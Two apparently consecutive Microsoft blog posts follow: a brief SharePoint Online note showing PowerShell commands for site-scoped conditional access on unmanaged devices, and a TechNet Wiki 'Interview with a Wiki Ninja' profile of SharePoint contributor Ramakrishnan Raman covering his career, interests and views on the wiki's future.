Conditional access is an investment in addressing the ever-changing security landscape and business needs. Site-scoped device-based policies for SharePoint and OneDrive introduce a new level of granularity, helping you ensure that data on corporate resources is not leaked onto unmanaged devices (such as non-domain-joined or non-compliant devices) by limiting access to content to the browser and preventing files from being taken offline or synchronized with OneDrive on unmanaged devices, at either the tenant or site collection level.

These policies can be configured via PowerShell using the SPO Management Shell:

Connect-SPOService -Url <URL to your SPO admin center>

$Site = Get-SPOSite -Identity <Url to SPO Site Collection>

Set-SPOSite -Identity $Site.Url -ConditionalAccessPolicy AllowLimitedAccess

NOTE: The Tenant-level device-based policy must be configured to Full Access prior to configuring site-scoped policies.
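If you later need to revert a site collection to unrestricted access, the same cmdlet accepts an AllowFullAccess value. This is a sketch reusing the $Site variable from the commands above:

```powershell
Set-SPOSite -Identity $Site.Url -ConditionalAccessPolicy AllowFullAccess
```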

Pax

Interview with TechNet Ninja – Ramakrishnan Raman


Banner Created by Ousama El Hor

Meet the people behind the scenes!

The TechNet Wiki (TNWiki) Ninjas are the members who write the articles and share their knowledge with the community. Each week we interview one of the top TechNet Wiki Ninjas, who have impressed us. We write about their achievements and introduce them to the community, in our "Monday - Interview with a Wiki Ninja".

Today, I would like to introduce you Ramakrishnan Raman.

Ramakrishnan registered with MSDN in 2013, and since 2018 his activities in the community have flourished. The graph of his activity during the last year keeps rising; it seems only the sky is the limit.

Ramakrishnan joined the TNWiki group on Facebook in February 2018. He helps people in the MSDN/TN SharePoint forums and is active in many community discussions, which help shape the future of the community.

 

Let’s meet Ramakrishnan!


Ramakrishnan Raman

Here are some of Ramakrishnan’s Statistics:

  • Total of 878 Points, with 703 of these in 2018
  • Wrote 6 TNWiki articles, which won Gold medals

You can meet Ramakrishnan on Facebook, LinkedIn, or Twitter.

Well, it’s time to hear from Ramakrishnan…

 


Who are you, where are you, and what do you do? What are your specialty technologies? Also tell more about your interests?

Hello Everyone, My name is Ramakrishnan Raman, I am currently based in NOIDA (India).

My family hails from the southern part of India (Suchindrum, Kanyakumari).

I did my schooling in the capital of India, DELHI, and completed my graduation in B.Tech Information Technology from Chennai (India). I started my career in 2011 at Cognizant Technology Solutions (CTS), Chennai, which provided me an excellent platform to work on a Microsoft product – SharePoint. Later in 2014, I moved to Tata Consultancy Services (TCS), Chennai, where I continued to gather knowledge in the SharePoint/DotNet platform, which encouraged me to learn more about SharePoint solutioning/architecture. I joined HCL Technologies, NOIDA in 2016 and am currently working as a Technical Lead. The reason for this shift was to be with my parents, as I wanted to spend some quality time of my life with them.

To tell more about my personal interests, I love to be fit & healthy. So, I work out regularly & play outdoor sports like football and cricket.


Me with my parents, pic taken specifically for this interview, as we didn’t have a recent family photo.

What is TechNet Wiki for? Who is it for?

Well, according to me, TechNet Wiki is a portal that provides an appropriate way to share & gain knowledge based on your interest in Microsoft products/programming languages. TechNet Wiki is for those who have the urge to share the knowledge they have gained; it is also for the fellow members who search for solutions for their business/interest and hence benefit.

What do you do with TechNet Wiki, and how does that fit into the rest of your job and activities?

For me, TechNet Wiki and my job have a mutual relationship. The solutions I provide to clients at work are published as articles on TechNet. On the other hand (to meet a business requirement), I refer to TechNet Wiki.
To be more precise, TechNet Wiki has provided me recognition & encouragement from my team at the workplace as well as from the TechNet community, which has now become a driving factor to contribute more.


Picture taken during my visit to Switzerland to meet my sister(in Photo)

What is it about TechNet Wiki that interests you?

The foremost thing about TechNet Wiki that interests me is that we get quality content contributed by gurus from across the world, shared in the most presentable format for everyone. It is a gateway that makes publishing an article as easy as possible. These articles are easily accessible through search via Google/Bing thanks to the tags associated with them. Furthermore, the Wiki gives anyone the option to edit any article, so the articles published are kept up to date and relevant. Last but not least, when we write an article, we learn the concept ourselves along the way.

What are your favorite Wiki articles you’ve contributed and what are your top 5 favorite Wiki articles in general?

My favorite articles contributed by me

Top 5 favorite articles in the Wiki

Do you have any tips for new Wiki authors?

Yes, my tips for new wiki authors would be to publish articles which are;

  • Based on today’s trend.
  • Easily readable & understandable
  • Based on the domain they are well versed in.

For over half a year there have been discussions regarding the future of the TechNet Wiki. We are standing at a crossroads, and the decisions that will be made in the next few months will shape the future of the community.

How do you see the future of the TechNet Wiki in five, ten, or fifty years from now?

50 years will be too long to predict, but for the next 5 to 10 years, I see a steady growth in the community with quality content. I have also heard that there is a migration planned for the TechNet portal which I believe will bring a fresh look to the community portal.

This is your direct communication channel to the Microsoft team in charge of the TNWiki. Is there anything you want me to tell them?

If there is a migration planned, I would suggest the new portal be responsive (mobile friendly), so that people can read articles on the go with ease.

Do you want to add something in conclusion?

Even though I have come a long way with SharePoint solutions, I still consider myself a novice in the field of development. There is always something new to learn in today’s world. Also, I believe in working hard and being patient, which my parents have always taught me.

I would personally like to thank you for inviting me to this interview and for guiding me to improve the presentation of my articles, especially stressing the importance of a conclusion in the articles. I would also like to thank the TechNet community (Judges and Members) who have encouraged & appreciated me and my work.

Once again thank you for giving me this opportunity to express myself.


A view from my ancestral house at my native - Suchindrum


 

Thank you Ramakrishnan. It was our pleasure to hear more about the person behind the scene and to meet the real you.

It was great to hear from you directly, and nice to know more about you.

Thanks for your contributions to the community!

 

Please join me in thanking Ramakrishnan!


 

Note! The banner at the top of the post was created by Ousama El Hor. The signature which I use, includes the icon created by Floris van der Ploeg. You can read more about our yearly contest for banners and logo here.
